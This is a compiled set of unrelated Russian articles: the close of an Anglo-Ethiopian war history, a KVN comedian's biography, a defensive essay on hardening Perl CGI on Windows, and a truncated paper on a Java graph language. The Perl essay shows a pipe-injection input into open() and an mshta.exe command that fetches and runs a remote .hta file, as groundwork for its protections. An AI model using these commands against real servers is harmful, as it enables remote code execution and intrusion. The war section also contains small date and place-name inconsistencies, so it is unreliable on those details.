В декабре-мае 1867 г. Великобритания высадила в Эфиопии 13 000 солдат англо-индийских войск и 40 000 походных животных. В ходе боевых действий хорошо вооружённые британцы одержали ряд побед и к апрелю 1868 г. подошли к большой крепости Магдала. 10 апреля произошла битва при Ароге, в которой эфиопы потерпели поражение. Это была главная победа англичан в Эфиопии со времени их высадки в стране. В битве при Агоре англичане потеряли 29 человек ранеными, в то время как эфиопы потеряли 500 человек убитыми и 1000 ранеными. Путь на Магдалу был открыт. В крепости скрывался Теодрос II со всей своей, верной ему, свитой. 13 апреля британцы штурмом взяли крепость. Император Теодрос II, не желая сдаваться в плен, покончил с собой. Магдала пала. Эфиопы потеряли 700 человек убитыми и около полторы тысячи ранеными, а потери англичан выразились всего в двадцати раненых.
4. Конец войны
Великобритания не сумела удержать победу и утвердиться в захваченной стране. В Эфиопии развернулась национально-освободительная война. Финансовые потери англичан были огромными (8 600 000 фунтов стерлингов — по тем временам огромная сумма). Лондонский парламент отказался продолжать финансировать войну. Из Англии поступил приказ об отступлении. Главнокомандующий англо-индийской армией Роберт Нейпир в гневе приказал уничтожить до основания Магдалу вместе с церквями, как карательную меру против восставших эфиопов. Англичане начали отступать. В конце мая 1868 г. британцы окончательно покинули Эфиопию.
За победу над противником сэр Роберт Нейпир получил от английского парламента 2000 фунтов стерлингов ежегодной пенсии. Общественность Англии знала, что война завершилась неудачно, хотя британское правительство пыталось выставить всё иначе.
Ссылки
http://myweb.tiscali.co.uk/kenanderson/histemp/abyssinia1.html
http://www.cultinfo.ru/fulltext/1/001/008/057/279.htm
http://www.regiments.org/wars/19thcent/67abyss.htm
http://onwar.com/aced/chrono/c1800s/yr65/fangloethio1867.htm
Источник: http://ru.wikipedia.org/wiki/Англо-эфиопская_война |
https://doc4web.ru/istoriya/bashkatov-mihail-sergeevich.html | Башкатов, Михаил Сергеевич | https://doc4web.ru/uploads/files/152/4b36992aa6f13691c77d3d0af3dec724.docx | files/4b36992aa6f13691c77d3d0af3dec724.docx | План
Введение
1 Биография
1.1 Семья
1.2 КВН
2 Телеведущий
3 Актёр
3.1 Телешоу
3.2 Телесериалы
4 Признание и награды
Список литературы
Введение
Михаи́л Серге́евич Башка́тов (род. 19 августа 1981 года) — российский актёр, телеведущий, участник команды КВН «МаксимуМ».
1. Биография
Родился в Томске. Закончил экономический факультет Томского государственного университета.
СемьяЖена — Екатерина Башкатова (Багель). Сын — Тимофей[1]. КВН
Играть в КВН Михаил Башкатов начал в команде Томского государственного университета «Огни большого города». В ней он познакомился с Константином Маласаевым, который пригласил его параллельно с играми КВН принять участие в томском театре миниатюр «Бонифас»[2].
После того как команда КВН «Огни большого города» завершила свои выступления в сезоне Томского КВНа 1999 года, Башкатов вместе с Маласаевым и Алексеем Базаем покинул её и создал команду «МаксимуМ».
В 2000 году в составе команды «МаксимуМ» Башкатов стал чемпионом КВН г. Томска, а также лауреатом Всероссийского фестиваля студенческого творчества «Студенческая Весна 2000» (Нижний Новгород).
В 2001 году в составе «Бонифаса» завоевал Гран-при на томском фестивале СТЭМов «Юморина»; вместе с «МаксимуМом» стал вице-чемпионом Центральной лиги КВН «КВН-Азия» и третьим призёром Межрегиональной лиги КВН «КВН-Сибирь». Кроме того, Михаил Башкатов был приглашён в состав команды «Сибирские сибиряки», в составе которой провёл три игры в Высшей лиге КВН 2001.
В 2002 году театр «Бонифас» вместе с Михаилом Башкатовым вновь становится обладателем Гран-при томской «Юморины». В составе «МаксимуМа» становится финалистом Первой лиги КВН.
В 2003 году Башкатов покидает «Бонифас», решив сосредоточиться на выступлении в составе «МаксимуМа». Вместе со своей командой Михаил Башкатов вновь становится финалистом Первой лиги КВН, победителем томской «Юморины» и Кубка КВН г. Красноярска. Также «МаксимуМ» дебютирует на фестивале «Голосящий КиВиН» в составе так называемого «блока» — внеконкурсного выступления начинающих команд.
В 2004 году Башкатов вместе с «МаксимуМом» дебютирует в Премьер-лиге КВН и в первом же сезоне становится чемпионом, поделив первое место с «Мегаполисом». Кроме того, «максы́» (так именуют себя участники команды) вновь победили на томской «Юморине».
В 2005 году Башкатов в составе «МаксимуМа» принимает участие в 1/8 финала Высшей лиги КВН. Томичи выступают неудачно и, заняв последнее, пятое место, выбывают из Высшей лиги 2005 в первой же игре. Сезон Башкатов и его команда продолжают в Премьер-лиге, где второй год подряд становятся чемпионами. На музыкальном фестивале КВН в Юрмале «максы́» становятся обладателями «Малого КиВиНа в тёмном». Также «МаксимуМ» становится обладателем Кубка губернатора Новосибирской области и Кубка г. Красноярска.
В 2006 году «МаксимуМ» доходит до полуфинала Высшей лиги, где занимает второе место (в финал попадал только победитель игры), а также вновь получает «Малого КиВиНа в тёмном» на фестивале «Голосящий КиВиН 2006».
В 2007 году в полуфинале Высшей лиги Михаил Башкатов со своей командой становится третьим, пропустив вперёд «Обычных людей» и «Пирамиду». Однако, решением президента Международного союза КВН А. В. Маслякова «МаксимуМ» получил путёвку финал, где стал бронзовым призёром. На фестивале «Голосящий КиВиН 2007» томичи завоевали «Малого КиВиНа в светлом».
В 2008 году Михаил Башкатов в составе своей команды сначала стал обладателем высшей награды музыкального фестиваля в Юрмале, а затем — чемпионом Высшей лиги.
В 2009 году «максы» приняли участие в Летнем кубке КВН, где заняли третье место, а также завоевали «Большого КиВиНа в светлом» на фестивале «Голосящий КиВиН 2009».
В интервью «Комсомольской правде» Михаил Башкатов сказал, что больше не будет играть в Высшей лиге КВН, не исключив участия в фестивале «Голосящий КиВиН» и Летнем кубке[3].
Всего провёл 31 игру в в телевизионных лигах, кубках и фестивалях КВН:
15 игр в Высшей лиге КВН (сезоны 2001, 2005, 2006, 2007, 2008)
9 игр в Премьер-лиге КВН (сезоны 2004, 2005)
6 игр на музыкальном фестивале «Голосящий КиВиН» (2003, 2005, 2006, 2007, 2008, 2009)
1 игру в Летнем кубке (2009).
2. Телеведущий
2009—2010 — «Видеобитва»
3. Актёр
3.1. Телешоу
2009— Comedy Woman — гопник Башка
2009—2010 — Даёшь молодёжь! — гопник Башка, борец Радик, растаман Укроп, метросексуал Герман, вампир Эдгар и другие роли.
2009—2010 — Одна за всех
2010 — Случайные связи
3.2. Телесериалы
2010 — Игрушки — Гопник Башка
2010 — Однажды в милиции — Растаман Укроп
4. Признание и награды
В составе команды КВН «МаксимуМ»:
Чемпион Высшей лиги КВН 2008
Чемпион Премьер-лиги КВН 2004
Чемпион Премьер-лиги КВН 2005
Обладатель наград музыкального фестиваля Голосящий КиВиН:
«Большой КиВиН в золотом» на фестивале Голосящий КиВиН 2008
«Большой КиВиН в светлом» на фестивале Голосящий КиВиН 2009
«Малый КиВиН в светлом» на фестивале Голосящий КиВиН 2007
«Малый КиВиН в тёмном» на фестивале Голосящий КиВиН 2005
«Малый КиВиН в тёмном» на фестивале Голосящий КиВиН 2006
Обладатель Гран-при фестиваля «Юморина» (Томск) 2003
Обладатель Гран-при фестиваля «Юморина» (Томск) 2004
Обладатель Кубка г. Красноярска 2003
Обладатель Кубка губернатора Новосибирской области 2005
Обладатель Кубка г. Красноярска 2005
Лауреат Всероссийского фестиваля студенческого творчества в Нижнем Новгороде «Студенческая Весна 2000»
В составе театра миниатюр «Бонифас»:
Обладатель Гран-при фестиваля «Юморина» (Томск) 2001
Обладатель Гран-при фестиваля «Юморина» (Томск) 2002
Список литературы:
KP.RU: Михаил Башкатов стал отцом
Константин Маласаев («Максимум»): «Юморина» — большая школа (рус.) (01 апреля 2004).
Михаил Башкатов в Омске: «Ради хорошей роли я разденусь догола и поцелуюсь с мужчиной!» (рус.). omsk.kp.ru (05 ноября 2009).
Источник: http://ru.wikipedia.org/wiki/Башкатов,_Михаил_Сергеевич |
https://doc4web.ru/informatika/zaschischaem-perl-shunt-v-mozg-ili-zverskaya-neyrohirurgiya.html | Защищаем Perl: шунт в мозг, или зверская нейрохирургия | https://doc4web.ru/uploads/files/155/52585f787042778216f75c71cee2e77e.docx | files/52585f787042778216f75c71cee2e77e.docx | Защищаем Perl: шунт в мозг, или зверская нейрохирургия
Язык программирования Perl, будучи установленным на Web-сервере, отличается высокими требованиями к внимательности разработчика и квалификации системного администратора, при малейшей ошибке человека оставляя систему "открытой и доступной" для взломщиков всего мира. В статье рассмотрена возможность снизить угрозу, устанавливая свои собственные защитные механизмы (на примере "хирургического отрезания" и перехвата функций чтения, записи и выполнения файлов в системе Windows).
Если вы программируете (или собираетесь программировать) Internet-приложения на языке Perl, то наверняка сталкивались с информацией, описывающей уязвимости этого языка для хакерских атак. Простейший скрипт, приведенный в любом учебнике по языку Perl, на поверку оказывается "широко открытыми воротами" для хакеров, как многоопытных, так и начинающих. Например, фрагмент кода, который просто выводит содержимое указанного файла
open(f,$filename);
while(<f>)
{
print;
}
на самом деле может выполнять и другие действия. Подайте на его вход строку "|calc.exe", и вы запустите на выполнение стандартный калькулятор. В запуске на удаленном сервере стандартных программ (таких как calc.exe или notepad.exe) мало смысла, если не знать про идеальную отмычку хакера - утилиту mshta.exe. Она входит в стандартную поставку Windows и позволяет легко и непринужденно закачивать в атакуемую систему и выполнять в ней произвольный код.
Например, выполнение в системе команды:
mshta.exe http://www.malware.com/foobar.hta
приведет к скачиванию на компьютер файла foobar.hta и исполнению его как скрипта VBS. Этот пример создает и запускает безвредное (по заверениям устроителей сайта malware.com) приложение для MS-DOS, показывающее стандартный алгоритм генерации пламени. Естественно, таким же способом можно закачать и выполнить в системе произвольный исполняемый файл, даже если его там еще нет.
Кому это нужно?
Мне хотелось бы развеять предубеждение некоторых системных администраторов, что взлом именно их сервера никому не нужен. Железный аргумент - ссылка на Неуловимого Джо ("не такая уж мы важная птица, чтобы нас ломать"). В действительности, взлом любого (произвольного) сервера может принести хакеру пользу, поскольку открывает ему новые замечательные возможности:
Разослать с уязвимого сервера пару-тройку гигабайт почтового спама.
Устроить на уязвимом сервере "варезятник" для нелицензионного софта, музыки и видео.
Выполнить сложный и интересный математический расчет (обычно просчитывают криптографию, чтобы подобрать чей-то ключ, вовлекая в этот процесс - чтобы дело шло быстрее - множество взломанных машин).
Взломать или "заглушить" мусорными запросами (атака "отказ в обслуживании") более важный сервер (например, сервер какого-нибудь банка или государственного учреждения).
Таким образом, уязвимые серверы, независимо от их важности, представляют опасность не меньшую, чем те люди, которые умеют использовать эти серверы по их прямому назначению. :-)
Почему Perl уязвим?
Рациональное объяснение, зачем функция open в Perl отрабатывает символ конвейера | как команду запустить программу на выполнение, дать сложно: Perl вообще довольно иррациональный (зато гибкий и компактный) язык. :-) Автор языка Perl Ларри Уолл в шутку расшифровывает его название как Patalogically Eclectic Rubbish Lister (Паталогически Эклектичный Мусорный Листер) - мы можем лишь пожелать, чтобы следующие его версии развивались в направлении большей безопасности, однозначности и безошибочности кода - столь необходимых качеств для общедоступных Internet-приложений. Безусловно, "патологичность", "эклектичность" и "мусорность" - это отрицательные черты, с которыми Ларри Уолл должен бороться. :-)
Фильтрация пользовательского ввода
В статьях о безопасном программировании на языке Perl можно встретить рекомендации фильтровать пользовательский ввод: в частности, удалять из полученных извне строк символы | и другие знаки, имеющие в Perl специальное значение. Например, следующая фильтрация ввода "обеззаразит" полученное извне имя файла от специальных и опасных символов.
if ($filename =~/[<>\|\-&\.\\\/\0]/)
{die "Недопустимый символ в имени файла \n";}
open(f, $filename);
Оцените, какое изобилие специальных значков - "крокозябликов" надо отфильтровать для простой функции открытия файла. Очевидно, что надо быть глубоким экспертом по языку Perl и очень внимательным человеком, чтобы правильно расставить все фильтры. Поскольку от человека, в отличие от железного лома, трудно требовать стопроцентной надежности, расставленные в разных местах программы "ловушки на крокозябликов" на практике могут не сработать.
Ограничение прав Web-сервера
Internet-сервер и все запущенные им приложения, так или иначе, контактирующие со всем внешним миром, не должны иметь права администратора или привилегированного пользователя. Назначить службе Web-сервера ограниченные права - очень надежный (и, наверное, единственно правильный) способ защитить свой сервер от атак извне.
При проектировании Internet-сайта необходимо с самого начала разбить его информационное содержимое на отдельные папки, где находятся:
а) выполняемые скрипты и программы
б) данные, предназначенные только для чтения (HTML-страницы)
в) данные, предназначенные для изменения посетителями.
Пользователь, под именем которого будет запущен Internet-сервер, должен иметь доступ только к этим папкам, причем, на скрипты и данные надо наложить запрет записи (иначе хакер может слегка изменить внешний вид и функционирование вашего сайта), а на данные, предназначенные для изменения внешними пользователями - запрет выполнения (иначе он сможет создать и тут же выполнить в этой папке все что угодно). Этот вариант защиты теоретически "невскрываем" - но на практике у начинающего администратора возникнет ряд сложностей.
Так, в системе Windows web-сервер не запустится, если не открыть ему на доступ системные dll в папке c:\winnt\system32. А если их открыть, всему миру окажутся доступными замечательные программы наподобие regedt32.exe, mshta.exe и т.д. Можно, конечно, переписать на листочек список необходимых программе системных dll и открыть на доступ Internet-серверу только их. Но многие ли администраторы это делают (и надо ли им это?).
В Unix-подобных системах существуют свои трудности (одна из возможных проблем - закрытый 80 порт для процессов, не имеющих административных привилегий в системе).
В любом случае, этот метод защиты требует хорошей подготовки и высокой мотивации администратора системы, что указывает на фундаментальный недостаток такой защиты: ее нельзя установить принудительно, вместе с установкой защищаемой программы, и надежность компьютерной системы полностью зависит от надежности самого слабого ее звена - человеческого мозга.
"Лоботомия" Perl
Лоботомия - это операция по изменению личности путем повреждения лобных долей мозга, отвечающих за агрессию. Одно время эту операцию применяли по отношению к преступникам, чтобы уменьшить их опасность для общества. Хирург при помощи специального инструмента через глазницы достигал этой области мозга и легким постукиванием деревянным молоточком по рукоятке инструмента наносил необходимые повреждения (избыточная кровь и клеточная масса удалялись с помощью гибкого зонда).
Применять подобную операцию мы будем не к хакерам (в свое время ее признали бесчеловечной и антигуманной), а к бинарному дистрибутиву Perl, чтобы "отрубить" у него "агрессивную" реакцию на символ | ("конвейер").
Указанные ниже манипуляции носят тестовый характер - не применяйте их без тщательной проверки на тестовой системе и на тестовой копии данных.
Для этого мы отыщем в бинарном дистрибутиве Perl (для экспериментов я использую дистрибутив ActivePerl версии 5.6) подстроку "cmd.exe". Это вызов стандартной оболочки Windows NT/2000/XP (для Windows 9x имя стандартной оболочки - "command.com"). Нас интересуют файлы с расширением dll, где найдена эта строка. Если мы вызываем Perl запуском perl.exe, то нужная нам компонента - Perl56.dll (название может отличаться в зависимости от версии дистрибутива). Заменим каким-нибудь редактором (я использую встроенный редактор Far) подстроку cmd.exe на что-нибудь другое той же длины, например, sex.exe. Таким образом, символ "конвейера" окажется нерабочим, однако, мы сможем по-прежнему запускать приложения функцией system("ИмяПрограммы"). Так, согласитесь, хотя и менее компактно, зато гораздо безопаснее и менее агрессивно. :-)
Программа sex.exe должна выводить на стандартный вывод (stdout) какое-нибудь доброе и трогательное приветствие для хакера. Я надеюсь, что с ее созданием вы легко справитесь самостоятельно. :-).
Перехват системных вызовов
Мы предупредили не все опасности, подстерегающие Perl-программиста.
Давайте предположим, что мы хотим запретить интерпретатору Perl:
запуск любых внешних программ (мудрое решение; ту же отсылку почты безусловно лучше выполнять стандартными функциями Perl - иначе "лоботомию", в той или иной степени, пришлось бы выполнять ко всем программам, которые мы запускаем)
чтение файлов, если расширение не ".html"
запись файлов, если расширение не ".user".
Получив такой дистрибутив Perl, даже ... скажем так, не совсем грамотный Web-программист (требовать иного от живых людей мы не только не вправе, но и не в состоянии) будет чувствовать себя комфортно и, самое главное, сухо.
Роль "защитной прокладки" в данном случае выполнит специальная dll, которая перехватит указанные нами системные вызовы и, при необходимости, их заблокирует (в отличие от антивирусов, которые перехватывают системные вызовы сразу всех процессов в системе, мы будем перехватывать только системные вызовы Perl, не трогая остальную систему).
Мы будем использовать системные функции Windows GetProcAddress и GetModuleHandle, чтобы получить адреса функций для перехвата, ImageDirectoryEntryToData - чтобы получить адрес начала таблицы импорта, и функции VirtualProtect и WriteProcessMemory, чтобы внести изменения в эту таблицу.
Опираясь на эти ключевые слова, вы можете отыскать в Internet готовое решение, либо написать приложение-"перехватчик" самостоятельно. Получившийся у меня результат перехвата (я использовал компилятор Delphi, поскольку для языка C примеров можно найти достаточно) вы можете скачать по ссылке [1].
Внедрение защитной DLL
Чтобы "пристыковать" dll в адресное пространство процесса, я использую метод подмены DLL. Для этого я захожу ... правильно, текстовым редактором в исполняемый файл Perl.exe и исправляю подстроку Perl56.dll на romix1.dll (так мы назовем нашу защитную компоненту).
Пробую запускать Perl.exe. Конечно же, Perl пишет, что не найдена необходимая библиотека romix1.dll. Ну что же, создадим ее. Для этого скомпилируем программу из трех строк на Delphi, назвав ее romix1.dpr:
library romix1;
begin
end.
Этого недостаточно: теперь Perl при запуске выдает ошибку:
"Perl.exe связан с отсутствующим компонентом Romix1.dll:RunPerl".
Perl импортирует единственную функцию RunPerl из этой библиотеки, и мы ее сейчас создадим (наша "подделка" будет просто передавать управление на "оригинал"):
library romix1;
procedure RunPerlOrig; external 'Perl56.dll' name 'RunPerl';
//Это оригинальная функция RunPerl из библиотеки Perl56.dll.
procedure RunPerl; export; stdcall;
//Перехватчик функции RunPerl
begin
asm
jmp RunPerlOrig; //Делаем переход (jump)
end;
end;
exports RunPerl;
begin
//Расположенный здесь код будет выполняться при каждом запуске DLL
end.
Ассемблерная вставка делает переход, куда надо. Теперь ругательные сообщения прекратились, и изменений в работе Perl не видно. Зато мы достигли важного результата: наша dll стала полноправным членом (если не мозгом) исполняемого процесса Perl.exe. Дальнейшее становится делом техники (точнее, системных вызовов Windows API и нескольких "точечных" замен в таблице импорта Perl56.dll). Вы можете взять готовый код [1] и посмотреть, что у меня получилось.
Какие системные функции необходимо перехватывать?
Технология динамически компонуемых библиотек (DLL) существенно облегчает модификацию Windows-приложений (закрытый исходный код компенсируется тем, что все названия функций и точки их входа не только хорошо видны, но и доступны для изменения). Просматривать статический импорт DLL или EXE удобно при помощи утилиты dumpbin.exe из студии разработки Microsoft.
Пример вызова этой утилиты из командной строки:
dumpbin.exe /imports perl.exe
Программа выдаст список DLL и их функций, которые импортирует программа из этих DLL. Вот полезный нам фрагмент вывода этой утилиты:
Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file perl.exe
File Type: EXECUTABLE IMAGE
Section contains the following imports:
...
Perl56.dll
402038 Import Address Table
4020C0 Import Name Table
0 time date stamp
0 Index of first forwarder reference
3C3 RunPerl
...
Замечание: Из этого листинга мы видим, что программа импортирует библиотеку Perl56.dll Это большая и "тяжелая" динамическая библиотека, которая поддерживает все функции Perl; Perl.exe же фактически является небольшим загрузчиком для этой библиотеки, только лишь запуская ее единственную функцию RunPerl. Смысл такого разделения, видимо, в том, что при завершении работы Perl.exe система выгружает библиотеку из памяти лишь через несколько секунд, если к ней не будет новых обращений. Поскольку все запущенные копии Perl.exe используют только одну копию библиотеки, система экономит время на выгрузках-загрузках (при условии, конечно, что эта библиотека постоянно "висит" в памяти). Замечу, что экономии памяти от такого разделения не происходит, т.к. общие страницы всех запущенных копий одного и того же исполняемого файла система по любому помещает на одни и те же физические адреса.
Аналогично мы можем выяснить импорт библиотеки Perl56.dll (список функций, конечно же, окажется гораздо длиннее). Дальнейшие выяснения, на какие функции надо ставить "жучок", мы произведем опытным путем - мы примерно знаем (а если не знаем, то посмотрим), :-) какие API-функции должна импортировать скомпилированная в системе Windows простейшая тестовая C-программа, которая выполняет нужные нам действия. Другой вариант - выяснить это при помощи специальных "лоботомических инструментов": например, Numega SoftICE или Numega Bounds Checker (их рассмотрение выходит за рамки этой статьи). Я приведу лишь результат своих изысканий: нужные нам функции - это CreateProcessA (запуск приложения) из библиотеки KERNEL32.dll и функция fopen (открытие файла на чтение или на запись) из библиотеки MSVCRT.dll.
"За кадром" остались такие специальные вопросы, как формат таблицы импорта Windows-программы. Отчасти эту информацию можно получить в комментариях исходного кода [1], а отчасти - из литературы. Кстати, полезные для начинающих хакеров источники (например, книги Криса Касперски, Джеффри Рихтера и Мэтта Питрека) можно скорее найти в сети Internet, чем в книжных магазинах, где их почему-то очень быстро раскупают. :-)
Заключение
Мы попытались защитить Perl - один из наиболее популярных (хотя и несколько эклектичных) :-) языков для работы с CGI - от атак из Internet. Мы делали это на разных уровнях:
Фильтрацией пользовательского ввода
Ограничением прав доступа
Заменой подстрок в теле программы
Перехватом системных вызовов
Возможны еще два уровня защиты:
Перекомпиляция Perl
Перекомпиляция ядра операционной системы.
Эффективность защиты во всех рассмотренных случаях идет "по нарастающей".
Разумеется, нам важна не просто перекомпиляция, а перекомпиляция с внедрением защитных проверок. Наша цель - внедрить эти проверки тем или иным способом, пусть даже антигуманным и "хакерским". При помощи деревянного молоточка.
А авторы дистрибутивов уже сами разберутся, включать ли защитные опции в состав своих продуктов, и активизировать ли их по умолчанию. :-) |
https://doc4web.ru/informatika/yazik-obrabotki-grafov-na-baze-ava.html | Язык обработки графов на базе JAVA | https://doc4web.ru/uploads/files/175/2e237cce8d4e8192b72fc0ca82b8d49e.docx | files/2e237cce8d4e8192b72fc0ca82b8d49e.docx | УДК 681.3
М.Ю. КРУКОВСКИЙ
Язык обработки графов на базе JAVA.
Abstract: This paper describes a language for definition of wokflow processes. As a core for the language was used graph model. This language was involved in creation of system for workflow processes developing and execution
Key words: docflow, workflow, graph model, JAVA.
Анотація: У статті розглянута мова, що дає можливість описувати процеси композитного документообігу. Основою для мови була використана графова модель документообігу. Мови використовувалась для створення системи проективання та виконання процесів документообігу.
Ключові слова: електронний документообіг, процесне керування, графова модель, JAVA.
Аннотация: В статье рассмотрен язык, позволяющий описывать процессы композитного документооборота. Основой для языка послужила графовая модель документооборта. Язык использован для создания системы проектирования и исполнения процессов документооборота.
Ключевые слова: электронный документооборот, процессное управление, графовая модель, JAVA.
1.Введение
Формальный синтаксис и неформальная семантика определяют основные свойства существующих языков программирования. Языки и системы программирования подчинены общим законам эволюции [1]. Эволюция языков программирования прошла через парадигмы, которые в момент внедрения считались глубоко продуманными и устойчивыми. Такие парадигмы языков, как: процедурные, модульные, обьектно - ориентированные в свое время считалась едва ли не панацеей для всех задач. На сегодняшний день стало очевидно, что значимым является не только синтаксис или форма отображения грамматик, а прикладное значение языка.
В рамках настоящей статьи будет рассмотрено расширение языка JAVA, которое позволяет оперировать графами на уровне языковых конструкций. Автор пришел к необходимости данной разработки в процессе работы над реализацией системы композитного документооборота [2], основой которой выступает графовая модель [3]. Разработанное расширение распространяется с открытым кодом и может быть использовано для решения прикладных задач, оперирующих аппаратом теории графов.
2. Постановка проблемы
Для решения задачи предполагается расширить язык JAVA таким образом, чтобы с помощью этого расширенного языка можно было описывать и решать задачи документооборота, используя естественные для документооборота понятия и определения. В качестве основной модели предполагается использовать графовую модель, введенную автором настоящей статьи в работе [3]. Таким образом, задача создания языка документооборота сводится к задаче расширения JAVA возможностями работы с графами и наполнения этого языка семантикой документооборота.
Теория графов сегодня является очень важным и полезным аппаратом дискретной математики. Она широко применяется при решении, как теоретических вопросов, так и в практических инженерных задачах. Особенно много применений теория графов нашла при решении таких задач, как автоматизированный контроль, сетевое планирование и проектирование интегральных схем. Кроме этих задач, очень широко графы применяются при создании моделей различного взаимодействия. Интересным является факт, что графы используются не только в перечисленных, достаточно детерминированных задачах, но и в гуманитарных науках, таких как эпидемиология и лингвистика [4].
Необходимо отметить, что предлагаемый язык программирования, позволяющий обрабатывать графы, будет полезным многим программистам и востребован для решения широкого круга самых разнообразных задач. Основным достоинством предлагаемого языка является то, что он позволяет программисту оперировать графами, используя знакомый и привычный инструментарий. Основой для такого прикладного языка, реализующего работу с графами, целесообразно выбрать уже существующий широко используемый для общих прикладных задач язык программирования. На сегодняшний день такой платформой является доминирующий, практически без альтернативы, при разработке локальных и распределенных приложений язык JAVA. Помимо этого язык JAVA хорошо приспособлен для решения задач сетевого взаимодействия.
2.1. Состояние проблемы
Работы по разработке языков программирования, оперирующих понятиями теории графов, ведутся с семидесятых годов прошлого столетия. Каждый из полученных языков использовался для решения прикладных задач и являлся расширением языка программирования, наиболее широко используемого на то время.
Одним из первых появился язык GEA (Graph Extended Algol), который был разработан в 1970 на базе системы Univac 1108 и использовался в течении десятилетия в университетских вычислительных центрах [5]. Основным достоинством языка являлось то, что при своей простоте реализации, он позволял решать задачи обработки графов, использую базовые навыки программирования. Существенным недостатком этой разработки было непродуманное прикладное применение, что обусловило узкий круг использования. Широко использовался для прикладных задач язык GRASPE, построенный на базе библиотек языка LISP [6]. Название языка LISP (Лисп) происходит от list processing (обработка списков). Он широко используется в задачах символьной обработки, искусственного интеллекта, математической лингвистике и других. Помимо этого язык LISP может быть использован для построения графиков и задания чертежей. Но так как LISP оперирует списочными структурами, то его реализация позволила не только функционального оперировать графами, но и их визуализации [7].
Впоследствии предпринимались попытки создания универсального языка, который бы заложил долгосрочную базу под будущие языки обработки графов. Один из таких языков – GXL (Graph Transformation Languge), построенный на базе существовавшего, на тот момент, математического языка обработки деревьев TXL (Tree transformation language) [8]. Язык был хорошо проработан с математической точки зрения, что безусловно обеспечивало самые широкие возможности для обработки графов. В то же время, недостаточно было проработано его стыковка с языками программирования, что сделало этот язык известным только в кругу узких специалистов. Другое семейство языков, GBL (Graph Based Language), построенно в виде набора семантических определений и правил языковых цепочек с применением аппарата теории формальных языков [9]. Такой подход обеспечил невиданную до этого общность описаний. Но, вследствие недостаточной очевидности практической пользы применения, конкретных программных реализаций, основанных на этом языке, он остался невостребованным.
Таким образом, задача создания расширения языка программирования, оперирующего с графами, имеет достаточно проработанную и апробированную базу. В то же время реализаций такого языка на базе самого распространенного сейчас языка JAVA на данный момент автору неизвестно. Наиболее близкая к рассматриваемой в статье задаче - это разработанный на базе JAVA язык для иерархического моделирования и воспроизведения систем HiMASS-j (Hierarchical Modeling And Simulation System – Java) [10].
2.2. Выбор инструментария
Для решения поставленной выше задачи целесообразно использовать модификацию языка JAVA для реализации сложных приложений распределенных предприятий J2EE (JAVA 2 Enterprise Edition). Следует сказать, что язык J2EE делает упор не на библиотеки, а на набор связанных спецификаций и рекомендаций, которые собраны вместе для построения многоуровневых кроссплатформенных приложений. В данном контексте под спецификациями понимаются стандартизованные данные и методы их обработки, которые включены в платформу. При этом рекомендации представляют собой примеры реализаций по определенным предметным областям в соответствии со спецификой и особенностями применения.
Выбор языка J2EE в качестве исходной базы связан с тем, что именно он и его платформа рассматривается разработчиками JAVA, как наиболее перспективная среда проектирования и разработки распределенных JAVA приложений. Данная среда была специально модернизирована для поддержки современных требований для распределенных приложений.
3. Описание системы
Как уже отмечалось, язык GJE сделан в виде расширения к существующему и широко используемому языку JAVA. Автором предполагается, что сделанные на этом языке приложения можно будет использовать во всех трех существующих реализациях конечных приложений на JAVA, а именно – локальных приложений Application, удаленно исполняемых приложениях Applet и серверно- тиражируемых приложениях Servlet.
Технически язык GJE представляет собой внешнее расширение пакетов JAVA для решения задач документооборота и описан как package javax.workflow. Это дает возможность разработчиками подключать пакет и использовать его для решения задач документооборота.
Язык GJE позволяет строить модели документооборота, которые основаны на аппарате теории графов. Автором настоящей статьи в работе [3] введена графовая модель документооборота. Поэтому, при описании классов будет даваться не только общее назначение методов и данных с точки зрения графа как математического понятия, но и применения содержания классов, введенное в модели документооборота.
3.1. Описание интерфейсов языка GJE
Ниже приведено описание интерфейсов классов, являющихся основой языка GJE. Эти классы имеют тип “public”, поэтому они составляют основу построения конструкций документооборота на языке JAVA. Выбранная открытость реализации внешнего пакета обеспечивает возможность внесения модификаций в язык с учетом особенностей конкретных реализаций документооборота.
3.1.1. Класс Node
Класс Node представляет описание единицы нижнего уровня графа – вершины графа. Вершина графа является начальным элементом построения структуры, поэтому она не содержит методов, а содержит только значение, свойственное именно данной конкретной вершине. Как известно, совокупность вершин и их связи определяют граф.
В документообороте, множеству вершин графа соответствует множество состояний документов, используемых в моделируемом документообороте. Каждая отдельная вершина соответствует отдельному состоянию документа, выделение которого считается целесообразным при дискретизации процессов документооборота. Семантическими данными этого класса является содержательная часть документа. Такими данными могут быть текст, звук, видео и другие данные, которые могут быть задействованы в рамках используемых операционных систем и средств разработки.
При реализации документооборота, исходя из свойств языка JAVA, класс может быть расширен дополнительными методами обработки или данными. Такими данными может быть информация, которая не была известна на момент проектирования системы, а актуализировалась во время ее внедрения. Это дает возможность наращивать систему, при этом не нарушая основных правил.
Ниже приведен текст интерфейса класса Node.
package javax.workflow;
public interface Node
{
Object getValue();
void setValue(Object value) throws InvalidOperation;
}
3.1.2. Класс Edge
Класс Edge используется для описывания ребер графа. Ребро графа является базовым элементом аппарата теории графов и характеризуется тем, что соединяет одну или более вершин. Ребро может быть ненаправленным, то есть просто выступать элементом связности, упорядочивающим отношения между вершинами. Направленное ребро, кроме установления факта связности, еще и определяет последовательность в иерархии, то есть указывает на причинно- следственную связь между вершинами.
В применении к графовой модели документооборота, введенной автором в работе [3], вершина графа ассоциируется с действием, которое производит участник документооборота над документом. Если говорить более строго в терминах введенной модели, то ребро графа, описывающего модель документооборота является действием, произведение которого вызывает смену состояния документа с начального на промежуточное либо конечное. Соответственно, входящей вершиной графа является входящее для действия состояния документа. После произведения действия, установленного на ребре графа, документ принимает состояние, соответствующие исходящей вершине графовой модели.
Класс Edge содержит методы getInPoint и getOutPoint, которые используются для получения входящих и исходящих вершин соответственно. Метод getDirection получает данные, которые соотвествуют направленности ребра. Метод getDirection имеет тип Object , поскольку направленности ребра могут соответствовать не только собственно значение указания направленности, а и различные весовые характеристики ребра. Метод setDirection используется для принудительного установления свойств направленности.
Методы getValue и setValue предназначены для получения и установления дополнительных свойств ребра. В применении к задачами документооборота, это означает возможность введение дополнительной информации, свойственной действию. В частности, такой информацией является информация об исполнителях документооборота, которые могут либо должны производить это действие.
Ниже приведен текст интерфейса класса Edge.
package javax.workflow;
public interface Edge
{
Node getInPoint();
Node getOutPoint();
Object getDirection();
void setDirection(Object direction) throws InvalidOperation;
Object getValue();
void setValue(Object value) throws InvalidOperation;
}
3.1.3. Класс Graph
